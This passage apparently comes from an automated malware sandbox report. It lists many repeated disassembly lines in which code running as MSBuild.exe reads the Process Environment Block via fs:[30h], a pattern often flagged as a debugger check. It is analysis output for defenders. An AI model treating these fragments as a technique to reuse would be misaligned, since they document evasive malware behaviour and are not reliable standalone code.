                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01114260 mov eax, dword ptr fs:[00000030h]5_2_01114260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01114260 mov eax, dword ptr fs:[00000030h]5_2_01114260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01114260 mov eax, dword ptr fs:[00000030h]5_2_01114260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110826B mov eax, dword ptr fs:[00000030h]5_2_0110826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E284 mov eax, dword ptr fs:[00000030h]5_2_0114E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E284 mov eax, dword ptr fs:[00000030h]5_2_0114E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01190283 mov eax, dword ptr fs:[00000030h]5_2_01190283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01190283 mov eax, dword ptr fs:[00000030h]5_2_01190283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01190283 mov eax, dword ptr fs:[00000030h]5_2_01190283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011202A0 mov eax, dword ptr fs:[00000030h]5_2_011202A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011202A0 mov eax, dword ptr fs:[00000030h]5_2_011202A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A62A0 mov eax, dword ptr fs:[00000030h]5_2_011A62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A62A0 mov ecx, dword ptr fs:[00000030h]5_2_011A62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A62A0 mov eax, dword ptr fs:[00000030h]5_2_011A62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A62A0 mov eax, dword ptr fs:[00000030h]5_2_011A62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A62A0 mov eax, dword ptr fs:[00000030h]5_2_011A62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A62A0 mov eax, dword ptr fs:[00000030h]5_2_011A62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E62D6 mov eax, dword ptr fs:[00000030h]5_2_011E62D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A2C3 mov eax, dword ptr fs:[00000030h]5_2_0111A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A2C3 mov eax, dword ptr fs:[00000030h]5_2_0111A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A2C3 mov eax, dword ptr fs:[00000030h]5_2_0111A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A2C3 mov eax, dword ptr fs:[00000030h]5_2_0111A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A2C3 mov eax, dword ptr fs:[00000030h]5_2_0111A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011202E1 mov eax, dword ptr fs:[00000030h]5_2_011202E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011202E1 mov eax, dword ptr fs:[00000030h]5_2_011202E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011202E1 mov eax, dword ptr fs:[00000030h]5_2_011202E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A6500 mov eax, dword ptr fs:[00000030h]5_2_011A6500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E4500 mov eax, dword ptr fs:[00000030h]5_2_011E4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E4500 mov eax, dword ptr fs:[00000030h]5_2_011E4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E4500 mov eax, dword ptr fs:[00000030h]5_2_011E4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E4500 mov eax, dword ptr fs:[00000030h]5_2_011E4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E4500 mov eax, dword ptr fs:[00000030h]5_2_011E4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E4500 mov eax, dword ptr fs:[00000030h]5_2_011E4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E4500 mov eax, dword ptr fs:[00000030h]5_2_011E4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120535 mov eax, dword ptr fs:[00000030h]5_2_01120535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120535 mov eax, dword ptr fs:[00000030h]5_2_01120535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120535 mov eax, dword ptr fs:[00000030h]5_2_01120535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120535 mov eax, dword ptr fs:[00000030h]5_2_01120535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120535 mov eax, dword ptr fs:[00000030h]5_2_01120535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120535 mov eax, dword ptr fs:[00000030h]5_2_01120535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E53E mov eax, dword ptr fs:[00000030h]5_2_0113E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E53E mov eax, dword ptr fs:[00000030h]5_2_0113E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E53E mov eax, dword ptr fs:[00000030h]5_2_0113E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E53E mov eax, dword ptr fs:[00000030h]5_2_0113E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E53E mov eax, dword ptr fs:[00000030h]5_2_0113E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01118550 mov eax, dword ptr fs:[00000030h]5_2_01118550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01118550 mov eax, dword ptr fs:[00000030h]5_2_01118550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114656A mov eax, dword ptr fs:[00000030h]5_2_0114656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114656A mov eax, dword ptr fs:[00000030h]5_2_0114656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114656A mov eax, dword ptr fs:[00000030h]5_2_0114656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E59C mov eax, dword ptr fs:[00000030h]5_2_0114E59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01112582 mov eax, dword ptr fs:[00000030h]5_2_01112582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01112582 mov ecx, dword ptr fs:[00000030h]5_2_01112582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01144588 mov eax, dword ptr fs:[00000030h]5_2_01144588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011345B1 mov eax, dword ptr fs:[00000030h]5_2_011345B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011345B1 mov eax, dword ptr fs:[00000030h]5_2_011345B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011905A7 mov eax, dword ptr fs:[00000030h]5_2_011905A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011905A7 mov eax, dword ptr fs:[00000030h]5_2_011905A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011905A7 mov eax, dword ptr fs:[00000030h]5_2_011905A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011165D0 mov eax, dword ptr fs:[00000030h]5_2_011165D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114A5D0 mov eax, dword ptr fs:[00000030h]5_2_0114A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114A5D0 mov eax, dword ptr fs:[00000030h]5_2_0114A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E5CF mov eax, dword ptr fs:[00000030h]5_2_0114E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E5CF mov eax, dword ptr fs:[00000030h]5_2_0114E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011125E0 mov eax, dword ptr fs:[00000030h]5_2_011125E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E5E7 mov eax, dword ptr fs:[00000030h]5_2_0113E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E5E7 mov eax, dword ptr fs:[00000030h]5_2_0113E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E5E7 mov eax, dword ptr fs:[00000030h]5_2_0113E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E5E7 mov eax, dword ptr fs:[00000030h]5_2_0113E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E5E7 mov eax, dword ptr fs:[00000030h]5_2_0113E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E5E7 mov eax, dword ptr fs:[00000030h]5_2_0113E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E5E7 mov eax, dword ptr fs:[00000030h]5_2_0113E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E5E7 mov eax, dword ptr fs:[00000030h]5_2_0113E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114C5ED mov eax, dword ptr fs:[00000030h]5_2_0114C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114C5ED mov eax, dword ptr fs:[00000030h]5_2_0114C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01148402 mov eax, dword ptr fs:[00000030h]5_2_01148402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01148402 mov eax, dword ptr fs:[00000030h]5_2_01148402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01148402 mov eax, dword ptr fs:[00000030h]5_2_01148402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110E420 mov eax, dword ptr fs:[00000030h]5_2_0110E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110E420 mov eax, dword ptr fs:[00000030h]5_2_0110E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110E420 mov eax, dword ptr fs:[00000030h]5_2_0110E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110C427 mov eax, dword ptr fs:[00000030h]5_2_0110C427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01196420 mov eax, dword ptr fs:[00000030h]5_2_01196420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01196420 mov eax, dword ptr fs:[00000030h]5_2_01196420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01196420 mov eax, dword ptr fs:[00000030h]5_2_01196420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01196420 mov eax, dword ptr fs:[00000030h]5_2_01196420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01196420 mov eax, dword ptr fs:[00000030h]5_2_01196420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01196420 mov eax, dword ptr fs:[00000030h]5_2_01196420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01196420 mov eax, dword ptr fs:[00000030h]5_2_01196420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113245A mov eax, dword ptr fs:[00000030h]5_2_0113245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011CA456 mov eax, dword ptr fs:[00000030h]5_2_011CA456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110645D mov eax, dword ptr fs:[00000030h]5_2_0110645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E443 mov eax, dword ptr fs:[00000030h]5_2_0114E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E443 mov eax, dword ptr fs:[00000030h]5_2_0114E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E443 mov eax, dword ptr fs:[00000030h]5_2_0114E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E443 mov eax, dword ptr fs:[00000030h]5_2_0114E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E443 mov eax, dword ptr fs:[00000030h]5_2_0114E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E443 mov eax, dword ptr fs:[00000030h]5_2_0114E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E443 mov eax, dword ptr fs:[00000030h]5_2_0114E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E443 mov eax, dword ptr fs:[00000030h]5_2_0114E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113A470 mov eax, dword ptr fs:[00000030h]5_2_0113A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113A470 mov eax, dword ptr fs:[00000030h]5_2_0113A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113A470 mov eax, dword ptr fs:[00000030h]5_2_0113A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119C460 mov ecx, dword ptr fs:[00000030h]5_2_0119C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011CA49A mov eax, dword ptr fs:[00000030h]5_2_011CA49A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011444B0 mov ecx, dword ptr fs:[00000030h]5_2_011444B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119A4B0 mov eax, dword ptr fs:[00000030h]5_2_0119A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011164AB mov eax, dword ptr fs:[00000030h]5_2_011164AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011104E5 mov ecx, dword ptr fs:[00000030h]5_2_011104E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01110710 mov eax, dword ptr fs:[00000030h]5_2_01110710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01140710 mov eax, dword ptr fs:[00000030h]5_2_01140710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114C700 mov eax, dword ptr fs:[00000030h]5_2_0114C700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114273C mov eax, dword ptr fs:[00000030h]5_2_0114273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114273C mov ecx, dword ptr fs:[00000030h]5_2_0114273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114273C mov eax, dword ptr fs:[00000030h]5_2_0114273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118C730 mov eax, dword ptr fs:[00000030h]5_2_0118C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114C720 mov eax, dword ptr fs:[00000030h]5_2_0114C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114C720 mov eax, dword ptr fs:[00000030h]5_2_0114C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01110750 mov eax, dword ptr fs:[00000030h]5_2_01110750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119E75D mov eax, dword ptr fs:[00000030h]5_2_0119E75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152750 mov eax, dword ptr fs:[00000030h]5_2_01152750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152750 mov eax, dword ptr fs:[00000030h]5_2_01152750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01194755 mov eax, dword ptr fs:[00000030h]5_2_01194755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114674D mov esi, dword ptr fs:[00000030h]5_2_0114674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114674D mov eax, dword ptr fs:[00000030h]5_2_0114674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114674D mov eax, dword ptr fs:[00000030h]5_2_0114674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01118770 mov eax, dword ptr fs:[00000030h]5_2_01118770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120770 mov eax, dword ptr fs:[00000030h]5_2_01120770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B678E mov eax, dword ptr fs:[00000030h]5_2_011B678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C47A0 mov eax, dword ptr fs:[00000030h]5_2_011C47A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011107AF mov eax, dword ptr fs:[00000030h]5_2_011107AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111C7C0 mov eax, dword ptr fs:[00000030h]5_2_0111C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011907C3 mov eax, dword ptr fs:[00000030h]5_2_011907C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011147FB mov eax, dword ptr fs:[00000030h]5_2_011147FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011147FB mov eax, dword ptr fs:[00000030h]5_2_011147FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119E7E1 mov eax, dword ptr fs:[00000030h]5_2_0119E7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011327ED mov eax, dword ptr fs:[00000030h]5_2_011327ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011327ED mov eax, dword ptr fs:[00000030h]5_2_011327ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011327ED mov eax, dword ptr fs:[00000030h]5_2_011327ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152619 mov eax, dword ptr fs:[00000030h]5_2_01152619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118E609 mov eax, dword ptr fs:[00000030h]5_2_0118E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112260B mov eax, dword ptr fs:[00000030h]5_2_0112260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112260B mov eax, dword ptr fs:[00000030h]5_2_0112260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112260B mov eax, dword ptr fs:[00000030h]5_2_0112260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112260B mov eax, dword ptr fs:[00000030h]5_2_0112260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112260B mov eax, dword ptr fs:[00000030h]5_2_0112260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112260B mov eax, dword ptr fs:[00000030h]5_2_0112260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112260B mov eax, dword ptr fs:[00000030h]5_2_0112260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01146620 mov eax, dword ptr fs:[00000030h]5_2_01146620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01148620 mov eax, dword ptr fs:[00000030h]5_2_01148620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112E627 mov eax, dword ptr fs:[00000030h]5_2_0112E627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111262C mov eax, dword ptr fs:[00000030h]5_2_0111262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112C640 mov eax, dword ptr fs:[00000030h]5_2_0112C640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01142674 mov eax, dword ptr fs:[00000030h]5_2_01142674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D866E mov eax, dword ptr fs:[00000030h]5_2_011D866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011D866E mov eax, dword ptr fs:[00000030h]5_2_011D866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114A660 mov eax, dword ptr fs:[00000030h]5_2_0114A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114A660 mov eax, dword ptr fs:[00000030h]5_2_0114A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01114690 mov eax, dword ptr fs:[00000030h]5_2_01114690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01114690 mov eax, dword ptr fs:[00000030h]5_2_01114690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011466B0 mov eax, dword ptr fs:[00000030h]5_2_011466B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114C6A6 mov eax, dword ptr fs:[00000030h]5_2_0114C6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0114A6C7
